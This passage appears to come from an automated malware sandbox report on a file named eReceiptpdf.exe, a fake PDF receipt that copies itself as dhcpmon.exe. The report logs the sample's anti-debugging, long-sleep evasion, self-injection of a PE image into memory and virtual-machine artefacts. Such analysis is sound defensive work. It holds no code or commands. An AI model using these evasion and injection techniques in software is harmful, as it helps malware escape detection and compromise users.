Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\eReceiptpdf.exe TID: 6304	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6908	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6788	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 1860	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\eReceiptpdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\eReceiptpdf.exe	Window / User API: threadDelayed 3224	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Window / User API: threadDelayed 5855	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Window / User API: foregroundWindowGot 716	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Window / User API: foregroundWindowGot 597	Jump to behavior

Source: C:\Users\user\Desktop\eReceiptpdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\eReceiptpdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Amcache.hve.11.dr	Binary or memory string: VMware
Source: Amcache.hve.11.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.11.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.11.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.11.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.11.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.11.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.11.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.11.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\eReceiptpdf.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\eReceiptpdf.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176

Jump to behavior

Source: C:\Users\user\Desktop\eReceiptpdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\eReceiptpdf.exe	Memory written: C:\Users\user\Desktop\eReceiptpdf.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Memory written: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process created: C:\Users\user\Desktop\eReceiptpdf.exe C:\Users\user\Desktop\eReceiptpdf.exe	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to behavior

Source: eReceiptpdf.exe, 00000000.00000000.295792070.0000000001B10000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: eReceiptpdf.exe, 00000000.00000000.295792070.0000000001B10000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: eReceiptpdf.exe, 00000000.00000000.295792070.0000000001B10000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: eReceiptpdf.exe, 00000000.00000000.295792070.0000000001B10000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\eReceiptpdf.exe	Queries volume information: C:\Users\user\Desktop\eReceiptpdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Queries volume information: C:\Users\user\Desktop\eReceiptpdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\eReceiptpdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation	Jump to behavior
